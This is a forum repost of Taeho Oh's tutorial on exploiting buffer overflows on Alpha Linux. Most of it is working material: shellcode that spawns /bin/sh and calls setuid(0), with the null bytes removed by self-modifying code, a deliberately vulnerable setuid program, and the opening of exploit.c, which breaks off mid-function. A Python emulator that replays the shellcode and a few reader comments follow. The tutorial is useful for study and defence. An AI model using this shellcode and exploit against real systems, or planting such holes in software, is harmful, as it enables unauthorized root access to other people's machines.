   소유
   http://soyu.cafe2.net
Buffer overflow, by 오하라 (Ohhara)

http://www.hackerschool.org/HS_Boards/zboard.php?id=Free_Lectures&no=213


- Translated without Taeho Oh's permission.

-------------------------------------------------------------------------------

Buffer overflow exploit in the alpha linux





Written by Taeho Oh ( ohhara@postech.edu )

----------------------------------------------------------------------------

Taeho Oh ( ohhara@postech.edu )                   http://postech.edu/~ohhara

PLUS ( Postech Laboratory for Unix Security )        http://postech.edu/plus

PosLUG ( Postech Linux User Group )          http://postech.edu/group/poslug

----------------------------------------------------------------------------





1. Introduction

There is plenty of buffer overflow exploit code around, but almost all of it
works only on Intel x86 Linux. This paper explains how to exploit the same
bug on Alpha Linux.



2. What do you have to know before reading?

You have to know assembly language, C, and Linux, and of course what a
buffer overflow is. You can find that information in phrack 49-14
( Smashing The Stack For Fun And Profit by Aleph1 ). It is a wonderful paper
on buffer overflows, and I highly recommend reading it before this one.



3. The registers of alpha linux

You have to know the Alpha's registers to write a shellcode. :)
All registers are 64 bits wide.





Registers of Alpha

----------------------------------------------------------------------------

$0        v0

$1        t0

$2        t1

$3        t2

$4        t3

$5        t4

$6        t5

$7        t6

$8        t7

$9        s0

$10        s1

$11        s2

$12        s3

$13        s4

$14        s5

$15        fp

$16        a0

$17        a1

$18        a2

$19        a3

$20        a4

$21        a5

$22        t8

$23        t9

$24        t10

$25        t11

$26        ra

$27        t12

$28        at

$29        gp

$30        sp

$31        zero

$32        pc

$33        vfp

----------------------------------------------------------------------------



4. Make a simple shellcode

Now you will write a simple shellcode. Don't worry about '\0' characters
yet; you can modify the code and remove them later.



shellcodeasm.c

----------------------------------------------------------------------------

#include<stdio.h>
#include<unistd.h>          /* execve() */

int main(void)
{
        char *name[2];
        name[0]="/bin/sh";
        name[1]=NULL;
        execve(name[0],name,NULL);
        return 0;
}

----------------------------------------------------------------------------



compile and disassemble

----------------------------------------------------------------------------

[ ohhara@ohhara ~ ] {1} $ gcc -o shellcodeasm -static shellcodeasm.c

[ ohhara@ohhara ~ ] {2} $ gdb shellcodeasm

GNU gdb 4.17.0.4 with Linux/x86 hardware watchpoint and FPU support

Copyright 1998 Free Software Foundation, Inc.

GDB is free software, covered by the GNU General Public License, and you are

welcome to change it and/or distribute copies of it under certain conditions.

Type "show copying" to see the conditions.

There is absolutely no warranty for GDB.  Type "show warranty" for details.

This GDB was configured as "alpha-redhat-linux"...

(gdb) disassemble main

Dump of assembler code for function main:

0x1200001e8 <main>:     ldah    gp,18(t12)

0x1200001ec <main+4>:   lda     gp,30704(gp)

0x1200001f0 <main+8>:   lda     sp,-32(sp)

0x1200001f4 <main+12>:  stq     ra,0(sp)

0x1200001f8 <main+16>:  stq     fp,8(sp)

0x1200001fc <main+20>:  mov     sp,fp

0x120000200 <main+24>:  ldq     t0,-30952(gp)

0x120000204 <main+28>:  stq     t0,16(fp)

0x120000208 <main+32>:  stq     zero,24(fp)

0x12000020c <main+36>:  ldq     a0,16(fp)

0x120000210 <main+40>:  addq    fp,0x10,a1

0x120000214 <main+44>:  clr     a2

0x120000218 <main+48>:  ldq     t12,-32456(gp)

0x12000021c <main+52>:  jsr     ra,(t12),0x120007180 <__execve>

0x120000220 <main+56>:  ldah    gp,18(ra)

0x120000224 <main+60>:  lda     gp,30648(gp)

0x120000228 <main+64>:  mov     fp,sp

0x12000022c <main+68>:  ldq     ra,0(sp)

0x120000230 <main+72>:  ldq     fp,8(sp)

0x120000234 <main+76>:  addq    sp,0x20,sp

0x120000238 <main+80>:  ret     zero,(ra),0x1

End of assembler dump.

(gdb) disassemble execve

Dump of assembler code for function __execve:

0x120007180 <__execve>: lda     v0,59(zero)

0x120007184 <__execve+4>:       callsys

0x120007188 <__execve+8>:       bne     a3,0x120007190 <__execve+16>

0x12000718c <__execve+12>:      ret     zero,(ra),0x1

0x120007190 <__execve+16>:      br      gp,0x120007194 <__execve+20>

0x120007194 <__execve+20>:      ldah    gp,18(gp)

0x120007198 <__execve+24>:      lda     gp,2116(gp)

0x12000719c <__execve+28>:      ldq     t12,-31592(gp)

0x1200071a0 <__execve+32>:

    jmp zero,(t12),0x120007738 <__syscall_error>

End of assembler dump.

(gdb)

----------------------------------------------------------------------------



Now you can see what is needed to execute "/bin/sh".



To execute "/bin/sh"

----------------------------------------------------------------------------

a0($16) = The address of "/bin/sh\0"

a1($17) = The address of the address of "/bin/sh\0"

a2($18) = 0

v0($0) = 59

callsys

----------------------------------------------------------------------------



With this information you can write a shellcode very easily.



testsc1.c

----------------------------------------------------------------------------

char shellcode[]=

        "\x30\x15\xd9\x43"      /* subq $30,200,$16             */

        "\x31\x15\xd8\x43"      /* subq $30,192,$17             */

        "\x12\x04\xff\x47"      /* clr $18                      */

        "\x40\xff\x1e\xb6"      /* stq $16,-192($30)            */

        "\x48\xff\xfe\xb7"      /* stq $31,-184($30)            */

        "\x68\x00\x7f\x26"      /* ldah $19,0x0068($31)         */

        "\x2f\x73\x73\x22"      /* lda $19,0x732f($19)          */

        "\x3c\xff\x7e\xb2"      /* stl $19,-196($30)            */

        "\x69\x6e\x7f\x26"      /* ldah $19,0x6e69($31)         */

        "\x2f\x62\x73\x22"      /* lda $19,0x622f($19)          */

        "\x38\xff\x7e\xb2"      /* stl $19,-200($30)            */

        "\x3b\x00\x1f\x20"      /* lda $0,59($31)               */

        "\x83\x00\x00\x00";     /* callsys                      */



typedef void (*F)(void);

int main(void)
{
        F fp;
        fp=(F)(&shellcode);     /* treat the byte string as code */
        fp();                   /* works because the data segment is executable here */
        return 0;
}

----------------------------------------------------------------------------



The code may look frightening. Don't worry, there is a line by line
explanation. :)



testsc1.c shellcode line by line explanation

----------------------------------------------------------------------------

char shellcode[]=



        "\x30\x15\xd9\x43"      /* subq $30,200,$16             */
        /* $16 = $30 - 200                                      */
        /* $30 is the stack pointer. The shellcode needs some   */
        /* free memory to hold "/bin/sh\0", and $30 - 200 is    */
        /* probably free. :) The string "/bin/sh\0" will be     */
        /* stored at address $30 - 200, and $16 has to point to */
        /* it to execute "/bin/sh".                             */
        /* The 'q' of 'subq' means 64 bit (quadword).           */



        "\x31\x15\xd8\x43"      /* subq $30,192,$17             */
        /* $17 = $30 - 192                                      */
        /* To execute "/bin/sh", $17 has to point to the        */
        /* address of "/bin/sh\0", which will be stored at      */
        /* address $30 - 192.                                   */





        "\x12\x04\xff\x47"      /* clr $18                      */
        /* Clear the $18 register. To execute "/bin/sh", $18    */
        /* (the envp argument) must be 0.                       */



        "\x40\xff\x1e\xb6"      /* stq $16,-192($30)            */
        /* Store the address of "/bin/sh\0" at address          */
        /* $30 - 192.                                           */



        "\x48\xff\xfe\xb7"      /* stq $31,-184($30)            */
        /* Store 0 at address $30 - 184 (the NULL that          */
        /* terminates the argv array).                          */



        "\x68\x00\x7f\x26"      /* ldah $19,0x0068($31)         */
        /* $19 = 0x00680000                                     */
        /* $31 is always 0.                                     */





        "\x2f\x73\x73\x22"      /* lda $19,0x732f($19)          */
        /* $19 = 0x0068732f                                     */
        /* $19 = "/sh\0"                                        */
        /* because alpha is little endian.                      */





        "\x3c\xff\x7e\xb2"      /* stl $19,-196($30)            */
        /* Store $19 at address $30 - 196.                      */
        /* $30 - 196 = "/sh\0"                                  */
        /* The 'l' of 'stl' means 32 bit (longword).            */



        "\x69\x6e\x7f\x26"      /* ldah $19,0x6e69($31)         */

        /* $19 = 0x6e690000                                     */



        "\x2f\x62\x73\x22"      /* lda $19,0x622f($19)          */

        /* $19 = 0x6e69622f                                     */

        /* $19 = "/bin"                                         */



        "\x38\xff\x7e\xb2"      /* stl $19,-200($30)            */
        /* Store $19 at address $30 - 200.                      */
        /* $30 - 200 = "/bin"                                   */



        "\x3b\x00\x1f\x20"      /* lda $0,59($31)               */
        /* $0 = 59                                              */
        /* To execute "/bin/sh", $0 must be 59 (the execve      */
        /* system call number).                                 */



        "\x83\x00\x00\x00";     /* callsys                      */
        /* System call.                                         */
        /* Execute "/bin/sh".                                   */



----------------------------------------------------------------------------



compile and execute testsc1.c

----------------------------------------------------------------------------

[ ohhara@ohhara ~ ] {1} $ gcc testsc1.c -o testsc1

[ ohhara@ohhara ~ ] {2} $ ./testsc1

bash$

----------------------------------------------------------------------------



Now you have an Alpha Linux shellcode. However, you can't use it to exploit
vulnerable programs yet, because the shellcode contains many '\0' characters,
and a string copy stops at the first one. You have to remove every '\0'
character before the shellcode can be used in a buffer overflow exploit.



5. Try to remove '\0' character in the shellcode



You can remove '\0' characters by replacing those instructions with other
instructions that do the same work.



remove '\0' character

----------------------------------------------------------------------------

from



"\x68\x00\x7f\x26"      /* ldah $19,0x0068($31)         */

"\x2f\x73\x73\x22"      /* lda $19,0x732f($19)          */



to



"\x98\xff\x7f\x26"      /* ldah $19,0xff98($31)         */

"\xd0\x8c\x73\x22"      /* lda $19,0x8cd0($19)          */

"\x13\x05\xf3\x47"      /* ornot $31,$19,$19            */

----------------------------------------------------------------------------



One '\0' is removed.



----------------------------------------------------------------------------

from



"\x3b\x00\x1f\x20"      /* lda $0,59($31)               */



to



"\x13\x94\xe7\x43"      /* addq $31,60,$19              */

"\x20\x35\x60\x42"      /* subq $19,1,$0                */

----------------------------------------------------------------------------



Two '\0' characters are removed.



improved shellcode

----------------------------------------------------------------------------

char shellcode[]=

        "\x30\x15\xd9\x43"      /* subq $30,200,$16             */

        "\x31\x15\xd8\x43"      /* subq $30,192,$17             */

        "\x12\x04\xff\x47"      /* clr $18                      */

        "\x40\xff\x1e\xb6"      /* stq $16,-192($30)            */

        "\x48\xff\xfe\xb7"      /* stq $31,-184($30)            */

        "\x98\xff\x7f\x26"      /* ldah $19,0xff98($31)         */

        "\xd0\x8c\x73\x22"      /* lda $19,0x8cd0($19)          */

        "\x13\x05\xf3\x47"      /* ornot $31,$19,$19            */

        "\x3c\xff\x7e\xb2"      /* stl $19,-196($30)            */

        "\x69\x6e\x7f\x26"      /* ldah $19,0x6e69($31)         */

        "\x2f\x62\x73\x22"      /* lda $19,0x622f($19)          */

        "\x38\xff\x7e\xb2"      /* stl $19,-200($30)            */

        "\x13\x94\xe7\x43"      /* addq $31,60,$19              */

        "\x20\x35\x60\x42"      /* subq $19,1,$0                */

        "\x83\x00\x00\x00";     /* callsys                      */

----------------------------------------------------------------------------



compile and execute testsc2.c

----------------------------------------------------------------------------

[ ohhara@ohhara ~ ] {1} $ gcc testsc2.c -o testsc2

[ ohhara@ohhara ~ ] {2} $ ./testsc2

bash$

----------------------------------------------------------------------------



Only one instruction is left to fix now, but it is hard to remove: the
callsys instruction is required to execute "/bin/sh", and callsys contains
three '\0' characters. You have to insert code that modifies the shellcode
itself so that the callsys instruction can still be used.



6. Try to remove ALL '\0' character in the shellcode



You have to remove the '\0' characters of the callsys instruction.



final shellcode

----------------------------------------------------------------------------

char shellcode[]=

        "\x30\x15\xd9\x43"      /* subq $30,200,$16             */

        /* $16 = $30 - 200                                      */
        /* $16 must hold the shellcode address. However, before */
        /* the bsr instruction $16 can't have that address yet, */
        /* so this instruction just stores a meaningless one.   */
        /* All instructions before the bsr are meaningless on   */
        /* the first pass.                                      */



        "\x11\x74\xf0\x47"      /* bis $31,0x83,$17             */

        /* $17 = 0 or 0x83  (bitwise OR)                        */
        /* $17 = 0x83                                           */



        "\x12\x94\x07\x42"      /* addq $16,60,$18              */

        "\xfc\xff\x32\xb2"      /* stl $17,-4($18)              */

        /* $17 ("\x83\x00\x00\x00") is stored at address        */
        /* $16 + 60 - 4.                                        */
        /* ( "\xff\xff\xff\xff" -> "\x83\x00\x00\x00" )         */



        "\xff\x47\x3f\x26"      /* ldah $17,0x47ff($31)         */

        "\x1f\x04\x31\x22"      /* lda $17,0x041f($17)          */

        /* $17 = "\x1f\x04\xff\x47"                             */

        /* "\x1f\x04\xff\x47" is nop instruction.               */



        "\xfc\xff\x30\xb2"      /* stl $17,-4($16)              */

        /* Change the "bsr $16,-28" instruction into a nop      */
        /* instruction so that execution passes through it.     */
        /* ( "\xf9\xff\x1f\xd2" -> "\x1f\x04\xff\x47" )         */



        "\xf9\xff\x1f\xd2"      /* bsr $16,-28                  */

        /* Jump to "bis $31,0x83,$17" and store the address of  */
        /* the next instruction in $16.                         */
        /* After the jump, this instruction will have been      */
        /* changed into a nop instruction.                      */





        "\x30\x15\xd9\x43"      /* subq $30,200,$16             */

        "\x31\x15\xd8\x43"      /* subq $30,192,$17             */

        "\x12\x04\xff\x47"      /* clr $18                      */

        "\x40\xff\x1e\xb6"      /* stq $16,-192($30)            */

        "\x48\xff\xfe\xb7"      /* stq $31,-184($30)            */

        "\x98\xff\x7f\x26"      /* ldah $19,0xff98($31)         */

        "\xd0\x8c\x73\x22"      /* lda $19,0x8cd0($19)          */

        "\x13\x05\xf3\x47"      /* ornot $31,$19,$19            */

        "\x3c\xff\x7e\xb2"      /* stl $19,-196($30)            */

        "\x69\x6e\x7f\x26"      /* ldah $19,0x6e69($31)         */

        "\x2f\x62\x73\x22"      /* lda $19,0x622f($19)          */

        "\x38\xff\x7e\xb2"      /* stl $19,-200($30)            */

        "\x13\x94\xe7\x43"      /* addq $31,60,$19              */

        "\x20\x35\x60\x42"      /* subq $19,1,$0                */



        "\xff\xff\xff\xff";     /* callsys ( disguised )        */

        /* This will be changed to "\x83\x00\x00\x00"           */

----------------------------------------------------------------------------



compile and execute testsc3.c

----------------------------------------------------------------------------

[ ohhara@ohhara ~ ] {1} $ gcc testsc3.c -o testsc3

[ ohhara@ohhara ~ ] {2} $ ./testsc3

bash$

----------------------------------------------------------------------------



7. Insert setuid(0) code in the shellcode.



You may not get a root shell by overflowing a vulnerable setuid root program
with this shellcode. You have to insert setuid(0) code into the shellcode.



setuidasm.c

----------------------------------------------------------------------------

#include<unistd.h>          /* setuid() */

int main(void)
{
        setuid(0);
        return 0;
}

----------------------------------------------------------------------------



compile and disassemble

----------------------------------------------------------------------------

[ ohhara@ohhara ~ ] {1} $ gcc -o setuidasm -static setuidasm.c

[ ohhara@ohhara ~ ] {2} $ gdb setuidasm

GNU gdb 4.17.0.4 with Linux/x86 hardware watchpoint and FPU support

Copyright 1998 Free Software Foundation, Inc.

GDB is free software, covered by the GNU General Public License, and you are

welcome to change it and/or distribute copies of it under certain conditions.

Type "show copying" to see the conditions.

There is absolutely no warranty for GDB.  Type "show warranty" for details.

This GDB was configured as "alpha-redhat-linux"...

(gdb) disassemble main

Dump of assembler code for function main:

0x1200001e8 <main>:     ldah    gp,18(t12)

0x1200001ec <main+4>:   lda     gp,30696(gp)

0x1200001f0 <main+8>:   lda     sp,-16(sp)

0x1200001f4 <main+12>:  stq     ra,0(sp)

0x1200001f8 <main+16>:  stq     fp,8(sp)

0x1200001fc <main+20>:  mov     sp,fp

0x120000200 <main+24>:  clr     a0

0x120000204 <main+28>:  ldq     t12,-31056(gp)

0x120000208 <main+32>:  jsr     ra,(t12),0x120007180 <__setuid>

0x12000020c <main+36>:  ldah    gp,18(ra)

0x120000210 <main+40>:  lda     gp,30660(gp)

0x120000214 <main+44>:  mov     fp,sp

0x120000218 <main+48>:  ldq     ra,0(sp)

0x12000021c <main+52>:  ldq     fp,8(sp)

0x120000220 <main+56>:  addq    sp,0x10,sp

0x120000224 <main+60>:  ret     zero,(ra),0x1

End of assembler dump.

(gdb) disassemble setuid

Dump of assembler code for function __setuid:

0x120007180 <__setuid>: lda     v0,23(zero)

0x120007184 <__setuid+4>:       callsys

0x120007188 <__setuid+8>:       bne     a3,0x120007190 <__setuid+16>

0x12000718c <__setuid+12>:      ret     zero,(ra),0x1

0x120007190 <__setuid+16>:      br      gp,0x120007194 <__setuid+20>

0x120007194 <__setuid+20>:      ldah    gp,18(gp)

0x120007198 <__setuid+24>:      lda     gp,2108(gp)

0x12000719c <__setuid+28>:      ldq     t12,-31600(gp)

0x1200071a0 <__setuid+32>:

    jmp zero,(t12),0x120007738 <__syscall_error>

End of assembler dump.

(gdb)

----------------------------------------------------------------------------



Now you can see what is needed for setuid(0).



To setuid(0)

----------------------------------------------------------------------------

a0($16) = 0

v0($0) = 23

callsys

----------------------------------------------------------------------------



This also contains a callsys instruction, so you have to remove the '\0'
characters from the setuid(0) code too.





testsc4.c

----------------------------------------------------------------------------

char shellcode[]=

        "\x30\x15\xd9\x43"      /* subq $30,200,$16             */

        "\x11\x74\xf0\x47"      /* bis $31,0x83,$17             */

        "\x12\x14\x02\x42"      /* addq $16,16,$18              */

        "\xfc\xff\x32\xb2"      /* stl $17,-4($18)              */

        "\x12\x94\x09\x42"      /* addq $16,76,$18              */

        "\xfc\xff\x32\xb2"      /* stl $17,-4($18)              */

        "\xff\x47\x3f\x26"      /* ldah $17,0x47ff($31)         */

        "\x1f\x04\x31\x22"      /* lda $17,0x041f($17)          */

        "\xfc\xff\x30\xb2"      /* stl $17,-4($16)              */

        "\xf7\xff\x1f\xd2"      /* bsr $16,-36                  */

        "\x10\x04\xff\x47"      /* clr $16                      */

        "\x11\x14\xe3\x43"      /* addq $31,24,$17              */

        "\x20\x35\x20\x42"      /* subq $17,1,$0                */

        "\xff\xff\xff\xff"      /* callsys ( disguised )        */

        "\x30\x15\xd9\x43"      /* subq $30,200,$16             */

        "\x31\x15\xd8\x43"      /* subq $30,192,$17             */

        "\x12\x04\xff\x47"      /* clr $18                      */

        "\x40\xff\x1e\xb6"      /* stq $16,-192($30)            */

        "\x48\xff\xfe\xb7"      /* stq $31,-184($30)            */

        "\x98\xff\x7f\x26"      /* ldah $19,0xff98($31)         */

        "\xd0\x8c\x73\x22"      /* lda $19,0x8cd0($19)          */

        "\x13\x05\xf3\x47"      /* ornot $31,$19,$19            */

        "\x3c\xff\x7e\xb2"      /* stl $19,-196($30)            */

        "\x69\x6e\x7f\x26"      /* ldah $19,0x6e69($31)         */

        "\x2f\x62\x73\x22"      /* lda $19,0x622f($19)          */

        "\x38\xff\x7e\xb2"      /* stl $19,-200($30)            */

        "\x13\x94\xe7\x43"      /* addq $31,60,$19              */

        "\x20\x35\x60\x42"      /* subq $19,1,$0                */

        "\xff\xff\xff\xff";     /* callsys ( disguised )        */



typedef void (*F)(void);

int main(void)
{
        F fp;
        fp=(F)(&shellcode);     /* treat the byte string as code */
        fp();                   /* works because the data segment is executable here */
        return 0;
}

----------------------------------------------------------------------------



If you have read this paper, you can recognize what testsc4.c does. :)



compile and execute testsc4.c

----------------------------------------------------------------------------

[ ohhara@ohhara ~ ] {1} $ gcc testsc4.c -o testsc4

[ ohhara@ohhara ~ ] {2} $ ./testsc4

bash$

----------------------------------------------------------------------------
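The following is an added example of my own, not code from the paper or its author: a minimal emulator for the handful of Alpha instruction forms used in sections 4 to 7 (lda/ldah, stl/stq, addq/subq/bis/ornot, bsr, callsys). It loads the testsc4.c bytes at an assumed address, lets the stl stores rewrite the two disguised callsys words and the bsr exactly as described above, and records what each callsys would request, so the '\0' removal and the self-patching can be checked without an Alpha machine. CODE_BASE, STACK_TOP and MEM_SIZE are assumptions of the simulation only.

```python
# Added example, not from the original paper: a minimal emulator for the Alpha
# instruction forms the shellcode uses (lda/ldah, stl/stq, addq/subq/bis/ornot,
# bsr, callsys). It replays the testsc4.c bytes in a simulated memory to check
# that the self-patching works and that no '\0' byte is left in the code.
import struct

MASK64 = (1 << 64) - 1
MEM_SIZE = 4096          # assumed size of the simulated address space
CODE_BASE = 0x100        # assumed address the shellcode is loaded at
STACK_TOP = 0xe00        # assumed initial $30; "/bin/sh" is built at $30 - 200
NOP = 0x47ff041f         # "\x1f\x04\xff\x47", the nop word used on the page
CALLSYS = 0x00000083     # "\x83\x00\x00\x00"

# testsc4.c shellcode copied from the page, as 29 little-endian words.
TESTSC4 = bytes.fromhex(
    "3015d943 1174f047 12140242 fcff32b2 12940942 fcff32b2 ff473f26 "
    "1f043122 fcff30b2 f7ff1fd2 1004ff47 1114e343 20352042 ffffffff "
    "3015d943 3115d843 1204ff47 40ff1eb6 48fffeb7 98ff7f26 d08c7322 "
    "1305f347 3cff7eb2 696e7f26 2f627322 38ff7eb2 1394e743 20356042 "
    "ffffffff"
)


def sext(value, bits):
    """Sign-extend a `bits`-wide two's complement field to a Python int."""
    return value - (1 << bits) if value & (1 << (bits - 1)) else value


def null_words(code):
    """Indices of the 4-byte instruction words that still contain a '\\0'."""
    return [i // 4 for i in range(0, len(code), 4) if 0 in code[i:i + 4]]


def emulate(code, max_steps=200):
    """Run `code` from CODE_BASE until execution falls off its end.

    Returns (regs, mem, syscalls, patches): the register file, the simulated
    memory, one (v0, a0, a1, a2) tuple per callsys reached, and one
    (offset, old_hex, new_hex) tuple per store that rewrote the code itself.
    """
    mem = bytearray(MEM_SIZE)
    mem[CODE_BASE:CODE_BASE + len(code)] = code
    end = CODE_BASE + len(code)
    regs = [0] * 32
    regs[30] = STACK_TOP
    pc = CODE_BASE
    syscalls, patches = [], []
    for _ in range(max_steps):
        if not CODE_BASE <= pc < end:
            break
        word = struct.unpack_from("<I", mem, pc)[0]
        pc += 4
        op = word >> 26
        ra, rb = (word >> 21) & 0x1f, (word >> 16) & 0x1f
        if word == CALLSYS:                                   # PALcode call
            syscalls.append((regs[0], regs[16], regs[17], regs[18]))
        elif op in (0x08, 0x09):                              # lda / ldah
            disp = sext(word & 0xffff, 16) << (16 if op == 0x09 else 0)
            regs[ra] = (regs[rb] + disp) & MASK64
        elif op in (0x2c, 0x2d):                              # stl / stq
            addr = (regs[rb] + sext(word & 0xffff, 16)) & MASK64
            size = 4 if op == 0x2c else 8
            data = regs[ra].to_bytes(8, "little")[:size]
            if CODE_BASE <= addr < end:                       # self-modification
                patches.append((addr - CODE_BASE,
                                mem[addr:addr + size].hex(), data.hex()))
            mem[addr:addr + size] = data
        elif op in (0x10, 0x11):                              # integer operate
            func, rc = (word >> 5) & 0x7f, word & 0x1f
            b = (word >> 13) & 0xff if word & 0x1000 else regs[rb]  # literal?
            a = regs[ra]
            ops = {(0x10, 0x20): a + b, (0x10, 0x29): a - b,   # addq, subq
                   (0x11, 0x20): a | b, (0x11, 0x28): a | ~b}  # bis, ornot
            regs[rc] = ops[(op, func)] & MASK64
        elif op == 0x34:                                      # bsr ra, disp
            regs[ra] = pc                      # return address = next word
            pc = (pc + 4 * sext(word & 0x1fffff, 21)) & MASK64
        else:   # e.g. the "\xff\xff\xff\xff" placeholder reached unpatched
            raise ValueError(f"unsupported word {word:#010x} "
                             f"at offset {pc - 4 - CODE_BASE}")
        regs[31] = 0                                # $31 always reads as zero
    return regs, mem, syscalls, patches


def cstring(mem, addr):
    """Read a NUL-terminated string out of the simulated memory."""
    return bytes(mem[addr:mem.index(0, addr)])


if __name__ == "__main__":
    regs, mem, calls, patches = emulate(TESTSC4)
    print("words containing a '\\0' byte:", null_words(TESTSC4))
    for off, old, new in patches:
        print(f"code[{off:3d}]: {old} -> {new}")
    for v0, a0, a1, a2 in calls:
        arg = cstring(mem, a0) if v0 == 59 else a0
        print(f"callsys v0={v0} a0={arg!r} a1={a1:#x} a2={a2:#x}")
```

Running it shows the two "ffffffff" words turning into "83000000" and the bsr into the nop word before each callsys is reached, with v0=23/a0=0 for setuid(0) and v0=59 with a0 pointing at "/bin/sh" for execve.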



8. Exploit a vulnerable setuid root program



You can exploit a classic vulnerable program on Alpha Linux. This is an
example.



vulnerable.c

----------------------------------------------------------------------------

#include<stdio.h>

#include<string.h>



void vulfunc(char *buf)

{

        char localbuf[1024];

        strcpy(localbuf+1,buf);

}



int main(int argc,char **argv)
{
        if(argc>1)
                vulfunc(argv[1]);       /* unbounded copy into localbuf */
        return 0;
}

----------------------------------------------------------------------------



You can't change the return address of the vulfunc function. When you
overflow localbuf in vulfunc, you change the return address of the main
function instead. ( It's similar to the stack of the SPARC. ) This is
because localbuf is stored after (above) the saved return address of vulfunc.
On Intel x86, localbuf is stored before (below) the vulfunc return address,
so overflowing localbuf there overwrites the return address of vulfunc.
On Alpha, however, overflowing localbuf can't change the return address of
vulfunc, but it can change the return address of main.



To be executed, instructions must be properly aligned. For example, an
instruction can be located at 0x120000000 or 0x120000004, but not at
0x120000001, 0x120000002, or 0x120000003. ( addresses step by 4 )



Alpha addresses are 64 bits wide. In almost all cases a stack address looks
like 0x000000011fffff24, which contains many '\0' characters. Therefore you
can't put many copies of the return address in the buffer; you must insert
exactly one, so you have to know the location of the return address exactly.
Finding it is not difficult, because the location of the return address is
decided at compile time.



exploit.c

----------------------------------------------------------------------------

#include<stdio.h>

#include<string.h>



#define OFFSET                            0

#define ALIGN                             3     /* 0, 1, 2, 3           */

#define RET_POSITION                   1028     /* 0, 4, 8, 12, . . .   */

#define NOP              "\x1f\x04\xff\x47"



char shellcode[]=

        "\x30\x15\xd9\x43"      /* subq $30,200,$16             */

        "\x11\x74\xf0\x47"      /* bis $31,0x83,$17             */

        "\x12\x14\x02\x42"      /* addq $16,16,$18              */

        "\xfc\xff\x32\xb2"      /* stl $17,-4($18)              */

        "\x12\x94\x09\x42"      /* addq $16,76,$18              */

        "\xfc\xff\x32\xb2"      /* stl $17,-4($18)              */

        "\xff\x47\x3f\x26"      /* ldah $17,0x47ff($31)         */

        "\x1f\x04\x31\x22"      /* lda $17,0x041f($17)          */

        "\xfc\xff\x30\xb2"      /* stl $17,-4($16)              */

        "\xf7\xff\x1f\xd2"      /* bsr $16,-36                  */

        "\x10\x04\xff\x47"      /* clr $16                      */

        "\x11\x14\xe3\x43"      /* addq $31,24,$17              */

        "\x20\x35\x20\x42"      /* subq $17,1,$0                */

        "\xff\xff\xff\xff"      /* callsys ( disguised )        */

        "\x30\x15\xd9\x43"      /* subq $30,200,$16             */

        "\x31\x15\xd8\x43"      /* subq $30,192,$17             */

        "\x12\x04\xff\x47"      /* clr $18                      */

        "\x40\xff\x1e\xb6"      /* stq $16,-192($30)            */

        "\x48\xff\xfe\xb7"      /* stq $31,-184($30)            */

        "\x98\xff\x7f\x26"      /* ldah $19,0xff98($31)         */

        "\xd0\x8c\x73\x22"      /* lda $19,0x8cd0($19)          */

        "\x13\x05\xf3\x47"      /* ornot $31,$19,$19            */

        "\x3c\xff\x7e\xb2"      /* stl $19,-196($30)            */

        "\x69\x6e\x7f\x26"      /* ldah $19,0x6e69($31)         */

        "\x2f\x62\x73\x22"      /* lda $19,0x622f($19)          */

        "\x38\xff\x7e\xb2"      /* stl $19,-200($30)            */

        "\x13\x94\xe7\x43"      /* addq $31,60,$19              */

        "\x20\x35\x60\x42"      /* subq $19,1,$0                */

        "\xff\xff\xff\xff";     /* callsys ( disguised )        */



unsigned long get_sp(void)

{

        __asm__("bis $31,$30,$0");

}



int main(int argc,char **argv)

{

        char buff[RET_POSITION+8+ALIGN+1],*ptr;

        char *nop;


  Hit : 15021     Date : 2004/07/07 05:19



    
ds: Now this is real scrolling pressure.. 2004/08/06
-0-: Agreed 2004/08/09
투명해커: Did you write this yourself? I read it to the end and still don't understand it 2005/11/10